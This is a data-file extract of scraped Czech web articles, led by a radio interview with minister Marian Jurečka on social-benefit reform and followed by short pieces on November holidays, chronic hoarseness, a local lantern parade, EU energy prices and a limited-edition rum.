určitě v budoucnu také se posuneme. Ale teď v tento okamžik já říkám jednoznačnou, jednoduchou věc. Prostě ten rodič dopředu musí vědět, že prostě pracovat a posílat děti do školy je něco normálního a za to ho oceňujeme. moderátor ——————– Pardon, já tomu rozumím. Na druhé straně, pokud takové rodině seberete sociální dávky, nemůže to vést k tomu, že nakonec skončí třeba na ulici, že podmínky toho dítěte budou ještě horší? Marian Jurečka , Takhle, já jim je neseberu zcela, tam bude mít určitý pokles takovýto rodič. Ostatně zase, abysme jako zase úplně se jako nedivili a posluchače nemátli. Už dnešní systém toto zná. Za loňský rok máme zhruba 880 případů, kdy rodičům byly sníženy dávky, protože jejich dítě a oni mu nezabezpečili plnění povinné školní docházky. Já to tady jenom dostávám do fáze, že to budu mít vlastně digitalizováno, budu schopen s tím lépe pracovat a víc to dneska zdůrazňuju a akcentuji, protože je potřeba, aby ti rodiče, kteří dneska na to kašlou, pardon za ten výraz, tak aby si to uvědomili, že na to ten stát bude klást větší důraz. moderátor ——————– Zástupkyně Charity včera ve Dvaceti minutách Radiožurnálu mluvila třeba o situaci, kdy dospělí člen domácnosti zaspí, nepřijde včas na schůzku na Úřadu práce a celá rodina, včetně dětí, kvůli tomu může přijít o dávku na bydlení a v důsledku toho může skončit na ulici. Nejsou tyhle ty věci přece jen přísné? Marian Jurečka , Takhle, když se vám stane, že jenom zaspíte, omluvíte se na tom úřadu práce telefonicky a sjednáte si náhradní termín, tak toho člověka nevyřadíme, ale když ten člověk nám. moderátor ——————– Pardon. Ale může, nemám garanci, že když se omluvím, tak. Marian Jurečka , V té evidenci se ti lidé mohou odvolat. Já to třeba potom ten systém to posuzuje, ale my máme lidi, kteří jako notoricky na ten úřad nejsou schopni přijít, vyhýbají se fakticky tomu úřadu a pardon, jako ten stát musí mít taky nějaká pravidla. Máme tady práva, máme tady povinnosti, takže není případ, že bych ráno zaspal schůzku smluvenou v osm a když ten den zavolám, omluvím se, že by mě někdo vyřadil. Ale jestliže jako jste nedostupný a nereagujete dny nebo týdny, tak jako tady musí být jako nějaká jako důslednost v tom systému. moderátor ——————– Iniciativa za rovnost, spravedlnost a lidská práva kritizovala také to, že jste nakonec opustili původní záměr poskytovat peníze na bydlení podle obvyklých nájmů v daném regionu. Tím se měl omezit tzv. obchod s chudobou, kdy stát přispívá na předražené a nevyhovující ubytovny nebo byty. Proč jste ten model cenových map opustil? Marian Jurečka , To je pro běžného posluchače teď jako asi těžko pochopitelné. Já se pokusím říct to velmi jako stručně a věcně. Ty cenové mapy jsou z informací, které jsou veřejně dostupné v nabídkách, které jsou dneska na webech realitní kanceláří, těch, kteří nabízejí své byty k pronájmu a jsou potom dopočítávány, protože nemají takovou strukturu za celé území České republiky . My dneska jako úřad práce a MPSV máme data od 300 000 žadatelů v České republice , kde přesně vidíme, jaká je položka nákladů nájemného, kolik jsou společné prostory, kolik je za plyn, za elektřinu. Já mám dneska nejpřesnější datovou základnu proto, abych viděl, jaká je struktura těch nákladů na to bydlení. A my chceme vycházet z ní, protože je nejpřesnější a je schopna nám velmi dobře odlišovat třeba i to, co dneska nevidíme v těch cenových mapách, že mám třeba rozdíl, že mám ten byt v krajském městě, anebo ho už mám v místní části toho krajského města. To já všechno v mých podkladech, datech, které mám jako MPSV, vidím a jsem schopen velmi objektivně a férově nastavovat ty hladiny tak, abychom platili jako daňoví poplatníci to, co je běžné v té dané lokalitě, co odpovídá tomu bydlení. A neplatili předražené ceny. Bohužel ty cenové mapy, které jsou dopočítávány, o kterých jsem tady mluvil v úvodu, nám takovouto přesnost toho zacílení neumožňují. moderátor ——————– Ta novela uvádí řadu podmínek, které musí splnit bydlení, aby na ně žadatel mohl dostávat sociální dávky. Máte představu, jak velká část žadatelů o dávky právě s tímhle může mít problém? Marian Jurečka , Mohou být situace, kdy my v tom zákoně vlastně poprvé historicky definujeme ty minimální požadavky, že je prostě normální, když tam platíme příspěvek, doplatek na bydlení, což dneska bohužel normální není, protože zákon to takto neřeší, že v takovémto bytě má být základní zázemí, kuchyň, kuchyňská linka, sociální zařízení, aby ten člověk mohl žít důstojně a v dobrých hygienických podmínkách. To mi teď do toho vkládáme, budeme to kontrolovat, budeme to vymáhat. A zároveň také už o tom jako nějaký ten měsíc mluvíme, takže je taky na těch majitelích těch nemovitostí, aby s tím začali pracovat, protože i oni žijí z toho, že tam ty nájemníky mají. A jestli nepřizpůsobí ty podmínky tomu, aby tady byly nějaké minimální standardy, tak pak holt tam ty peníze vyplácet nebudeme. moderátor ——————– Ale v tom případě ten, kdo tam teď bydlí, může skončit na ulici. Marian Jurečka , Je to otázka toho, že může se toto teoreticky stát, na druhou stranu ti lidé, ti majitelé nemovitostí na tom mají postavený na rovinu svůj podnikatelský záměr, ví rok dopředu, že tato změna přijde. moderátor ——————– Takže pardon, tomu rozumím. Na druhé straně pokud oni se na to, lidově řečeno, vykašlou, přijdou o peníze, ale horší možná je, když někdo přijde o bydlení. Marian Jurečka , A pak ten nájemník má možnost se také přesunou někam jinam. moderátor ——————– Máte pocit, že je dostatečná nabídka bytů pro tyto osoby? Marian Jurečka , Ne v Praze , ale v celé řadě regionů, kde na rovinu mám nejčastěji tyto nájemníky, tak ty bytové prostory tam mám. Já to přiblížím na příkladu. Já jsem také od celé řady těchto nevládních organizací slyšel před rokem, že 1. července se stane naprostý Armagedon v ubytování ukrajinských uprchlíků a že ti lidé nebudou mít střechu na hlavou, že zpřísňovaly ty podmínky. Nic takového se nestalo, takže já to neberu úplně na lehkou váhu, na druhou stranu říkám, tak kdy s tím problémem někam se posuneme? Všichni to přece říkají. Mizerné bydlení, nedůstojné podmínky. Stát tam vyplácí obrovské peníze. A já to teď se snažím narovnávat a rok dopředu těm vlastníkům říkám, hele, takhle to nejde, musíte s tím něco udělat. moderátor ——————– Daniel Hůle z Člověka v tísni ve včerejším Pro a proti kritizoval také rozdělení na zranitelné a nezranitelné osoby, mluvil o konkrétní situaci, kdy je samoživitelka s dítětem, má otce, kterému je třeba 56 let, má problémy ten otec, ona si ho vezme k sobě domů. V tu chvíli se ze zranitelné domácnosti stává nezranitelná domácnost. Pan Hůle mluvil o tom, že tím se změní nárok na normativní náklady. Dítě přichází o dávky. V tu chvíli podle něj vlastně vystavujete tu maminku dilematu, jestli má pomoci tomu blízkému člověku, který je v nouzi, nebo jestli se na něj, asi do třetice v našem rozhovoru použijeme to lidové slovo, vykašlat a říct, ať mu pomůže stát, že ona přece kvůli tomu nebude přicházet o peníze. Daniel Hůle to označil za narušení rodinné solidarity. Opravdu si za tímhle nastavením stojíte? Marian Jurečka , Přeložím pro běžného posluchače, aby tomu rozuměl. V tom vašem modelovém příkladu jestliže to je člověk, kterému je 56 let a může pracovat, tak mně přijde logické, aby pracoval. Pokud ten člověk má nějaké omezení, je třeba zdravotně handicapovaný, na to pamatujeme. Tak on je tou zranitelnou osobou. A pak se na ně nevztahují ty podmínky toho pracovního bonusu, ale přece já nemůžu přihlížet tomu, že mám tady rodiny, kteří pracují, snaží se naplno maximálně a pak jako pojmu jako tenhle pohled, který tady byl prezentován Danem Hůlem, kterého si jinak velmi vážím, že prostě řeknu, tam mám člověka v produktivním věku, on má zdravé ruce, nohy a hlavu. Může dělat, ale on jako nám jako dělat nebude chtít, nezapojí se ani do, tam máme institut veřejné služby, my tam, my to máme odstupňované. A my říkáme buďto pracovat, nebo chceme, aby se rekvalifikoval, anebo alespoň podmínka veřejné služby 30 hodin měsíčně. Takže my se snažíme, aby ty lidi byli aktivizováni, ale když nám ten člověk řekne, hele, já nechci dělat vůbec nic a chci, jak se říká, tady prostě jako lenošit doma, tak mě prostě zase jako přijde fér, když já tady jsem zodpovědný za peníze daňového poplatníka, říct hele, tak tady tahle podpora nebude v takové výši. A vy si to doma vyříkejte a jako snažte se. Jako se snaží naprostá většina normálních lidí každý den starat se o sebe a nečekat, co jim ten stát dá. Takže možná někomu to přijde moc tvrdé, ale jako na druhou stranu říkám, jako já se snažím ty pravidla jako nastavit férově, spravedlivě a holt jako na tu změnu, ať se ti lidé jako dokáže také připravit. Ale opravdu v tom systému my důsledně odlišujeme, že zranitelná osoba nemůže pracovat, tak prostě se k ní v tom systému chováme úplně jinak i k celé té domácnosti. moderátor ——————– Ministr práce a sociálních věcí, vicepremiér z KDU-ČSL Marian Jurečka zůstává dnešním hostem Dvaceti minut Radiožurnálu. Hodně emocí a debat vyvolává ten tzv. majetkový test, o kterém už jsme mluvili v úvodu. Každý žadatel o tu novou dávku bude muset doložit své majetkové poměry. Vy už jste říkal, jaké jsou ty limity. Zase když vezmeme konkrétní případ podle toho návrhu, když je osamělý senior, který má na účtu na horší časy naspořeno 210 000 Kč, nemá auto, nemá byt, nemá dům, tak ztratí nárok na tu sociální dávku, třeba na příspěvek na bydlení. Jiný osamělý senior, který má auto za milion, vlastní vilu, na účtu mu zůstane 190 000. Tak na ty dávky nárok mít bude. Přijde vám tohle spravedlivé? Marian Jurečka , Takhle. Nikdy nenajdete absolutní spravedlnost, to je potřeba si přiznat. Na druhou stranu my tam jasně říkáme, že budeme rozlišovat, jestli ten senior to má v rámci svého penzijního spoření, pak tu částku nezkoumáme, pak tam může mít klidně naspořeno přes penzijko půl milionu korun, a to není něco, co by ho limitovalo v tom, že by neprošel tím majetkovým testem. moderátor ——————– Ale ve chvíli, kdy ukončí to penzijní spoření a přijde mu to na účet. Tak v tu chvíli o to přichází. Marian Jurečka , Pořád pokud doloží, že tyhle peníze tam má nastřádané díky tomuto produktu, který byl s podporou státu, tak to je v pořádku. Na druhou stranu. Ten příklad, co vy jste řekl, ten příklad. Já na rovinu, já v tenhle okamžik nejsem schopen administrativně ani technicky zkoumat hodnoty těch nemovitostí nebo hodnoty těch automobilů. To bych ten systém extrémně zkomplikoval. Já to dneska stavím na tom, že to musí být jednoduché, kdy se digitálně doptáme na katastr nemovitostí a digitálně si sáhneme do registru vozidel, proto nejsem schopen zkoumat ani značku toho auta, ani objem, ani výkon, ani stáří. Je to nějaký základní krok. Do budoucna ať se klidně zváží, jestli to nějak parametricky neupravit. Já také férově přiznávám, dneska jsem to říkal na Sněmovně, předpokládám u toho majetkového testu velkou debatu a možná dospějeme ve finále k jiným parametrům jinak nastaveným. Ale zase si jako říkám, že je na místě, protože celá řada států to má jako fakt jako toto do toho systému vložit a ptát se, jestli lidem, kteří vlastní několik nemovitostí k bydlení, vlastní několik aut a mají třeba 300, 400, 500 000 jako samostatná osoba na účtu, jestli máme z peněz daňového poplatníka vyplácet ještě další dávky. A tohle si zodpoví každý sám. Já myslím, že tady máme hledat nějaký balanc a máme najít nějaký způsob parametrů, který řekne, od určité míry už ta pomoc tam být nemá. moderátor ——————– Mimochodem u toho zůstatku, to se budou řešit jenom peníze na bankovních účtech, to znamená, že když si člověk ty peníze vybere, nechá je doma, tak v tom případě. Marian Jurečka , Tak já nejsem schopen kontrolovat někomu kredenc, jsestli tam má peníze, nebo nemá. Jako já jsem si vědom toho, že v tom systému nejste schopen stoprocentní dokonalosti. A snažíme se to hledat nějak jako rozumně i vzhledem k technickým možnostem, to říkám férově, na rovinu. moderátor ——————– V případě těch seniorů. Nemotivujete je tím nastavením vlastně k tomu, aby svůj majetek přepisovali na děti a vnoučata? Marian Jurečka , v To je samozřejmě věc strategie každé rodiny, jak jako s tímto nakládá. moderátor ——————– Ale pokud to udělá, tak tedy to bude splňovat, když to neudělá, nebude to splňovat. Marian Jurečka , Já vám řeknu svůj osobní názor. Já si myslím, že člověk jako má v nějaké fázi života opravdu jako vyřešit i tyhle věci, nečekat, až se to bude řešit v rámci pozůstalosti, protože mimo jiné přináší to celou řadu potom sváru do rodiny, ale to je můj pohled. Ale já znovu jako říkám, já nikomu neberu jeho nemovitost, po nějakou dobu druhou k bydlení. Neřešíme tam ani pole, ani louky, ani rybníky, ani lesy. To všechno vím, že jakoby by bylo extrémně složité do toho to zapojovat, zúžili jsme to takto. A u té hotovosti znovu říkám, myslím si, že celá řada lidí ty peníze vlastně má významně s tou podporou státu, ať už v rámci penzíka nebo stavebka. moderátor ——————– Ale k té otázce, pokud ten senior by to přivedl, tak to tedy splní, to už nebudete zkoumat? Marian Jurečka , Pokud to převede, tak to samozřejmě takto splní. moderátor ——————– Ten návrh změn má být účinný od 1. července příštího roku. Pokud projde, co to bude znamenat pro současné příjemce těch čtyř sociálních dávek, bude muset každý z nich podat novou žádost? Marian Jurečka , Tam počítáme s tím, že máme v plánu půlroční přechodné období, to znamená, nemůžeme takovýto velký systém, takovouto obrovskou změnu, která se týká statisíců lidí, překlopit. jako přes půlnoc, to nejde. Takže my počítáme, že celý půlrok budou dobíhat ty lidi v tom původním systému a postupně budeme ty nové a samozřejmě těm, kterým třeba doběhají takovéto čtvrtletní dokládání přímo a podobně, tak ty budeme potom jako překlápět do toho systému nového tak, abychom to my zvládli administrativně, lidsky a aby to zvládli i ti lidi. moderátor ——————– V důvodové zprávě píšete, že náklady na digitální systém v souvislosti se změnou dávek budou 130 000 000. Znamená to tedy, že za 130 000 000 budete doprogramovávat a upravovat stávající systém Jenda? Marian Jurečka , Budeme ho vlastně doprogramovávat, rozšiřovat a zlepšovat jak pro toho klienta to užití, tak zároveň na tom pozadí to, aby na tom úřadu práce opravdu lidé do toho v zásadě vůbec nemuseli zasahovat, aby to běželo plně digitálně v té komunikaci na ty data, který potřebujeme sesbírat. Samozřejmě vždycky se souhlasem klienta, ale to chci podotknout, vždycky počítáme s tím, že budou klienti, kteří budou chodit na úřad práce, kteří budou to řešit, jak se říká, offline. Ať už to jsou lidé třeba vyššího věku, nebo třeba lidé, kteří nemají ty digitální kompetence, nemají chytrý telefon a podobně, takže pro tyhle lidi to bude vždycky na úřadu práce k dispozici v budoucnu. moderátor ——————– Říká dnešní host Dvaceti minut Radiožurnálu, ministr práce a sociálních věcí, místopředseda vlády z KDU-ČSL Marian Jurečka, díky za rozhovor. PODOBNÉ ČLÁNKY: Autor: admin</t>
  </si>
  <si>
    <t>184</t>
  </si>
  <si>
    <t>183</t>
  </si>
  <si>
    <t>20241101_223_3243663114_12ead7bf71a57e00270f.html</t>
  </si>
  <si>
    <t>12ead7bf71a57e00270f</t>
  </si>
  <si>
    <t>Listopadové tradice a svátky: Čas vzpomínek, úcty a oslav</t>
  </si>
  <si>
    <t>Listopadové tradice a svátky: Čas vzpomínek, úcty a oslav 1. listopadu 2024 · Zábava · Matěj Kašpar Listopad (Zdroj: Depositphotos) Listopad je měsícem, který nese zvláštní atmosféru – na jedné straně přináší klid přírody připravující se na zimní spánek, na straně druhé nabízí mnoho významných svátků a tradic, které nám připomínají hodnoty, jako jsou úcta, vděčnost a pospolitost. Jednou z nejvýznamnějších tradic jsou dušičky, svátek věnovaný vzpomínce na blízké, kteří už s námi nejsou. Tento den, známý také jako Památka zesnulých, připadá na 2. listopadu. Po celém světě lidé navštěvují hřbitovy, zapalují svíčky a přinášejí květiny, aby uctili památku zesnulých. Je to tichý, ale hluboký akt připomínající, jak důležité je udržovat spojení s těmi, kteří nám byli blízcí. Tomáš Portlík: Dopravní podnik musí vést manažer „sebevrah“ Dalším svátkem, který s listopadem neodmyslitelně souvisí, je Den válečných veteránů. Tento významný den, který se slaví 11. listopadu, vznikl na památku konce první světové války, kdy bylo v roce 1918 podepsáno příměří. Je to příležitost, kdy si připomínáme všechny, kdo bojovali za naši svobodu a nezávislost. Den válečných veteránů je připomínkou toho, že mír a bezpečí nejsou samozřejmostí, ale výsledkem obětí mnoha lidí. Tomáš Klus vydává osmé album. „Tady to máš“ jej vrací ke kořenům písničkářství Listopad je také spojený s tradicí svatého Martina , který se rovněž slaví 11. listopadu. Tento den je spjatý s řadou zvyků a lidových pověr – podle jedné z nich na svatého Martina často přichází první sníh. Svatý Martin je však především známý jako čas svatomartinských hodů. V tento den se na stolech objevuje tradiční pečená husa, mladé víno a další pochoutky. Je to čas oslav, kdy se rodiny a přátelé scházejí u společného stolu a užívají si podzimní hojnost. Dušičky v Česku: Památka zesnulých jako čas vzpomínek a úcty A konečně, listopad je měsícem Movemberu, globální kampaně zaměřené na podporu povědomí o mužském zdraví, zejména o prevenci rakoviny prostaty a dalších zdravotních rizik. Během Movemberu si muži po celém světě nechávají narůst knír, čímž upozorňují na důležitost pravidelných prohlídek a otevřené diskuse o mužských zdravotních problémech. Listopad je tak měsícem, kdy máme možnost nejen slavit a vzpomínat, ale také podpořit důležité iniciativy, které ovlivňují naši společnost. Autor: Matěj Kašpar Autor person Matěj Kašpar Rubrika transition_slide Zábava</t>
  </si>
  <si>
    <t>20241101_224_3243663182_c768f6a692525b709b3e.html</t>
  </si>
  <si>
    <t>c768f6a692525b709b3e</t>
  </si>
  <si>
    <t>Chronický chrapot může mít vážný důvod</t>
  </si>
  <si>
    <t>Chronický chrapot může mít vážný důvod 01.11.2024 ADDICTS PR Chrapot, nebo chcete-li nakřápnutý hlas, je běžným jevem, se kterým se většina z nás setkala. Po několika dnech by se však měl hlas začít vracet ke své obvyklé podobě. Pokud tomu tak není, je na místě zpozornět. Chronický chrapot, který přetrvává déle než několik týdnů, totiž může být varovným signálem těla, že se děje něco vážného. Zdroj: freepik.com Kdy zpozornět a zajít k lékaři? Chrapot způsobený infekcemi dýchacích cest patří k těm nejčastějším. Také přetížení hlasivek, konzumace příliš studených potravin a nápojů, nebo obyčejné nachlazení, to vše dokáže hlas změnit natolik, že se sami nepoznáváme. „Je-li chrapot způsobený některou z těchto běžných příčin, mělo by si s ním tělo poradit samo, případně za pomoci volně prodejných léků, maximálně do tří týdnů,“ říká prof. MUDr. Milan Sova , Ph.D., přednosta Kliniky nemocí plicních a tuberkulózy FN Brno, která patří mezi tuzemské i evropské špičky v oboru. Pokud však chrapot neustupuje nebo se naopak zhoršuje, je vhodné navštívit lékaře. A to především, je-li doprovázen přetrvávající bolestí nebo pocitem cizího tělesa v krku, vykašláváním neobvykle zabarveného hlenu či dokonce krve, potížemi s dýcháním, bolestivým polykáním nebo náhlou ztrátou hmotnosti. V takových případech se může jednat i o nádorové onemocnění – není zdaleka nejčastější příčinou chrapotu, ale jde o riziko, které bychom neměli podceňovat. Záněty hrtanu: Časté, ale zvládnutelné Naštěstí není většina případů chrapotu spojena s vážnými problémy. Nejčastější příčinou jsou laryngitidy – tedy záněty hrtanu, ať už akutní nebo chronické. Spolu s nimi se často objevuje i zánět hlasivek, který vede k jejich ztluštění a zhoršení schopnosti vibrovat. Tím se mění i zvuk hlasu. Akutní laryngitida bývá ve většině případů způsobena viry, často doprovází obyčejné nachlazení. „Chronická laryngitida může být způsobena dlouhodobým drážděním hlasivek, například kouřením, expozicí chemickým látkám nebo refluxní chorobou jícnu,“ doplňuje profesor Milan Sova . Odstranění příčin dráždění – tedy zanechání kouření, omezení konzumace alkoholu a kořeněných jídel nebo kontaktu s dráždivými látkami – může výrazně pomoci při léčbě chronické laryngitidy. Lékař také může předepsat či doporučit léky na zmírnění příznaků, například antitusika na suchý kašel či pastilky ke zmírnění bolesti v krku. „Reflux“ není jen pálení žáhy Dalším možným viníkem je stav, jehož latinský název reflux u nás také zdomácněl. V tomto kontextu jde o situaci, kdy žaludeční kyseliny dlouhodobě unikají zpět do jícnu, což vede k onomu nepříjemnému pocitu pálení žáhy. Pokud se však kyseliny dostávají až do oblasti hrtanu, mohou způsobit zánět a otok hlasivek. Tento stav bývá doprovázen chrapotem, pocitem cizího tělesa v krku a potřebou neustále odkašlávat. Léčba spočívá především v úpravě životního stylu, změně stravovacích návyků a vyhýbání se potravinám, které reflux zhoršují – typicky alkoholu , ostrému koření, ale i kouření. Někdy se však pacient neobejde bez léků na předpis snižujících produkci žaludečních kyselin a ve vážnějších případech může být nutný i chirurgický zákrok. „Pacienti s chronickým refluxem by měli být pečlivě sledováni, protože dlouhodobé působení kyseliny může vést k poškození hlasivek a dalším komplikacím,“ upozorňuje profesor Milan Sova . Rakovina hrtanu nebo plic: Když je potřeba zpozornět Chrapot v případě zhoubného onemocnění hrtanu nebo plic může vznikat tím, že nádor utlačuje hlasivkové nervy. Zatímco karcinom postihující hrtan a hlasivky se může chrapotem projevovat již v raných stádiích, u rakoviny plic platí, že přijde-li pacient s příznaky, zpravidla se jedná o pokročilé onemocnění. Pro prognózu pacienta je tedy klíčové včasné odhalení nemoci. „Proto v ČR běží program časného záchytu karcinomu plic. Mohou do něj vstoupit dlouholetí kuřáci – včetně těch bývalých, ve věku 55 – 74 let. Stačí se na program zeptat svého praktického lékaře, který vystaví žádanku na konzultaci u pneumologa. Ten pak může pacienta odeslat na bezbolestné CT vyšetření, které dokáže odhalit i velmi malý nádor. To je velmi důležité pro prognózu – čím menší je rozsah onemocnění, tím úspěšnější je léčba. Vstoupit do programu znamená být dobře hlídaný, vyšetření se opakuje každý 1 – 2 roky,“ doplňuje profesor Milan Sova . Detaily o programu jsou k dispozici na www.prevenceproplice.cz Když je problém v nervech V neposlední řadě nesmíme zapomenout ani na neurologické příčiny chrapotu. Poškození nervů, které ovládají hlasivky, může být způsobeno různými faktory. Kromě výše uvedeného může jít o komplikaci operací štítné žlázy nebo neurologická onemocnění jako Parkinsonova choroba či roztroušená skleróza. Každý pacient, u kterého je podezření na neurologickou příčinu chrapotu, by měl podstoupit neurologické vyšetření. Léčba závisí na konkrétní příčině, ale často zahrnuje rehabilitaci hlasivek nebo logopedickou terapii, aby se obnovila jejich správná funkce. Zdroje: https://cs.wikipedia.org/wiki/Laryngitida https://www.otorinolaryngologie.cz/content/uploads/2020/02/ppp-reflux.pdf https://www.linkos.cz/pacient-a-rodina/onkologicke-diagnozy/nadory-hlavy-a-krku-c00-14-c30-32/o-nadorech-hlavy-a-krku/ https://www.nzip.cz/clanek/1548-rakovina-plic-priciny-a-priznaky</t>
  </si>
  <si>
    <t>121</t>
  </si>
  <si>
    <t>360</t>
  </si>
  <si>
    <t>20241101_225_3243663277_7d5b5e3cc89fef56380e.html</t>
  </si>
  <si>
    <t>7d5b5e3cc89fef56380e</t>
  </si>
  <si>
    <t>Lampiónový průvod a strašidlácká párty 1.11.</t>
  </si>
  <si>
    <t>Lampiónový průvod a strašidlácká párty 1.11. Dnes zveme na dušičkový průvod zakončený strašidláckou párty ve společenském sále. Sraz jesenických strašidel je před jesenickou i zdiměřickou školou v 16:30. V 17 hodin startuje akce na zdiměřické louce, v 18 hodin strašidlácká párty ve společenském sále. Lampiónový průvod vychází z obou našich škol na zdiměřickou louku, následně všichni pokračují společně do společenského sálu. Sraz strašidel ZŠ Zdiměřice v 16:30 před školou. Průvod odchází společně s učiteli a komisí ovocnou alejí na ZDIMĚŘICKOU LOUKU v cca 16:45. Strašidla zdiměřické školy zvou zdiměřičáky před školu na malé občerstvení. Sraz strašidel ZŠ a ZUŠ Jesenice před školou v 16:30. Průvod odchází v cca 16:45 společně s učiteli a členy komise na ZDIMĚŘICKOU LOUKU. ZDIMĚŘICKÁ LOUKA - ZAHÁJENÍ 17:00 Po setmění půjdeme obvyklou trasu - ZDIMĚŘICKÁ - MLADÍKOV - CEDROVÁ - NA OCHOZE. Nezapomeňte si lucerničky a lampiony. Na cestě potkáme několik hodných strašidel a v cíli svou statečnost odměníme tancem. Čeká nás dětská STRAŠIDLÁCKÁ PÁRTY - show plná písniček a soutěží, o které se postará Hudební divadlo Hnedle vedle od 18 do 20 hodin. Vyhlášení masek proběhne v sále v 18:45! Těšit se můžete také na občerstvení, přilákat vás může vůně svařáku, čerstvých božích hranolek, grilovaná klobása nebo oštěpky, teplé i studené nealko nápoje i točené pivo . Stánek s tímto občerstvením najdete venku před úřadem. Uvnitř na baru budou převážně dobroty pro děti, sladkosti, cukrová vata, párek v rohlíku. Těšíme se na vás! Vytvořeno / změněno: 1.11.2024 / 1.11.2024 | Zveřejnit od-do: 30.10.2024-2.11.2024</t>
  </si>
  <si>
    <t>662</t>
  </si>
  <si>
    <t>267</t>
  </si>
  <si>
    <t>20241101_226_3243609119_9f567a4e5309facc8e0b.html</t>
  </si>
  <si>
    <t>9f567a4e5309facc8e0b</t>
  </si>
  <si>
    <t>Méně vizí a „mesiášství“, více reality života</t>
  </si>
  <si>
    <t>Méně vizí a „mesiášství“, více reality života Jeden by si mohl ruku vypsat a ústa vymluvit při vznášení argumentů, aby už se konečně začalo něco měnit v přístupu vlády národní i v evropské v tak základních potřebách, jakými jsou ceny energií. Ty následně určují životní úroveň populace v rámci světových regionů či států. Je pravdou, že tvrdé období „inkvizice“ zjednodušeně řečeno: toto je naše boží pravda a může to být jedině tak, jak je v ní psáno, jinak jste kacíři, proměnila realita života (měřená mj. drahotou základních statků) v umírněnější proud. K přijatelnému optimu má ale pořád dost daleko. Proč se nám elity (nejen ty politické) neustále snaží vnucovat svá řešení, když je už celé roky evidentní, že jejich postupy tak, jak jsou nastaveny (ve zkratce - zrušme hned a rychle vše fosilní, postavme za ně ryze obnovitelné, s čerstvým přimhouřením oka jádro a bude líp), k cíli trvale cenově dostupné elektřiny, tepla či pohonných hmot vést nemohou? Pravda, žít se bez nich taky dá, ale Evropa 21. století zpátky na rozvojovou úroveň zemí třetího světa nechce. Na to se ani nikoho nemusíte ptát. Byť vzdejme pofiderní „čest“ ideovým revolucionářům. Když odhlédneme od zájmu kapitálu – obrovské už investované prostředky určitě hrají svoji roli, tak dalším možným vysvětlením jsou snad už jen nadměrné sebevědomí (leckdy až arogance) a přesvědčení o vlastní mesiášské úloze při proměně světa. Snad aby do skály bylo vytesáno, v knihách (tedy spíše na internetu) zapsáno a v archivech (datacentrech) uloženo, že ten či onen se zasloužil o stát a blaho jeho lidí… Jenže tudy cesta při pohledu do statistik zřejmě taky nepovede. Podle Eurostatu zaplatili Češi v prvním pololetí roku 2024 při přepočtu na kupní sílu za jednu kilowatthodinu elektřiny 42 centů. A skončili bezpečně poslední (předposlední Kypr byl levnější o 15 %). Evropský cenový průměr byl o třetinu nižší. Normální člověk se tak ptá, jak je to možné, když vyrábíme jednu z nejlevnějších „elektrik“ v Evropě vůbec? Odpověď není jednoduchá, má asi více odpovědí. Ano, vyrábíme, ale prodává se podle jiných evropských pravidel, kde nejvyšší cenová nabídka táhne vše, takže i když by se všichni v ČEZ a dalších elektrárenských entitách v ČR rozkrájeli a snižovali ještě více výrobní ceny, evropská energetická burza nám vodu ve víno promění. Tedy co se týká ceny na pultu, nikoli kvality nápoje. Jak má potom ten samý člověk vnímat prohlášení nového českého eurokomisaře a bývalého šéfa průmyslu na idnes.cz: „Podařilo se nám také rekordně nastartovat rozvoj levných obnovitelných zdrojů energie (OZE).“ Nebo: „Velké výzvy, kterým jsme čelili, jsme zvládli mnohem lépe, než jsme vůbec mohli očekávat.“ Ti slušnější si poklepou při pohledu na tabulku Eurostatu na čelo a hořce polknou. Ti méně slušní bezbožně zaklejí… Půjdeme-li o úroveň výš, přímo do Evropské komise , zjistíme, že se vlastně není od čeho odchylovat. Je potřeba vytrvat v greendealovém úsilí a již se blíží doba, kdy budeme odměněni a vytřeme Číně i USA zrak. Jen škarohlídi přeci poukazují na hromadný úprk nejen německého průmyslu mimo energeticky cenově nepřijatelné hranice EU. Jak glosoval v červenci český ministr vnitra Vít Rakušan znovuzvolení Ursuly von der Leyenové do čela komise. „Jsem rád, že rozhodující vliv bude v EU mít racionální, konstruktivní politika, kterou představuje jak staronová šéfka Komise, tak i politické proudy, jež tvoří většinu v Evropském parlamentu.“ To jako fakt? Opravdu si myslíte, že s tím není potřeba už něco udělat? Zdroje: Eurostat a dále: https://www.idnes.cz/zpravy/domaci/jozef-sikela-komentar-ministr-prumyslu-a-obchodu-energeticka-bezpecnost.A241009_102031_domaci_tof https://svethospodarstvi.cz/…gu/</t>
  </si>
  <si>
    <t>20241101_227_3265810792_a2fd4a0d2ba37aa891c6.html</t>
  </si>
  <si>
    <t>a2fd4a0d2ba37aa891c6</t>
  </si>
  <si>
    <t>Limitovaný Brugal nese tóny dominikánské arabiky</t>
  </si>
  <si>
    <t>Limitovaný Brugal nese tóny dominikánské arabiky Kdo Bar Community Awards obdrží, se dozvíme 20. listopadu během slavnostního vyhlášení, jež se uskuteční v brněnském vzdělávacím centru CBA Abzac. Budete u toho s námi? Pozvánku obdržíte v nejbližších dnech. registrace Registrací získáte zdarma přístup do archivu článků starších jednoho roku. Jméno * Opakujte heslo * Souhlas Vyplněním uvedených polí a kliknutím na „registrovat“ udělujete AtBars Spirit, s. r. o., souhlas se zpracováním osobních údajů, jež bude provedeno dle platné legislativy. Automaticky se tak stanete odběratelem newsletteru, z nějž se ale můžete kdykoliv odhlásit. Uživatelské jméno nebo e-mail If you are a human and are seeing this field, please leave it blank. Fields marked with an * are required jméno e-mail Kolik je třináct mínus 6? Vyplněním uvedených polí a kliknutím na „přihlásit“ udělujete AtBars Spirit, s.r.o., souhlas se zpracováním osobních údajů, jež bude provedeno dle platné legislativy. Limitovaný Brugal nese tóny dominikánské arabiky 01.11.2024 AtBars Druhá edice limitované kolekce dominikánského rumu Brugal dává zazářit jedné z významných komodit stejné provenience. Colección Visionaria Edición 02 Coffee chutná po kávě, a to i díky speciální technice úpravy sudů označovaní jako aromatic cask toasting. Limitovaná Colección Visionaria, jež se zaměřuje na ingredience typické pro Dominikánskou republiku , měla svou premiéru v říjnu loňského roku. Prvním zástupcem této limitované rumové řady byla Edición 01 Cacao. Na její úspěch navazuje Colección Visionaria Edición 02 Coffee, jež je zasvěcena dominikánské arabice. Maestra ronera rumu Brugal Jassil Villanueva Quintana se inspirovala dlouhou tradicí pěstování kávy v Dominikánské republice , a to s cílem vytvořit rum ztělesňující cafecito moment, což je kávový rituál, jenž patří k setkávání s přáteli i rodinou. Pro staření Edición 02 Coffee proto použila sudy upravené metodou aromatic cask toasting, kterou sama vyvinula. Do procesu vypalování dubových sudů zakomponovala zrna dominikánské arabiky, charakteristická svěží kyselostí a bohatými čokoládovými tóny, jež se následně promítají do výsledné chuti 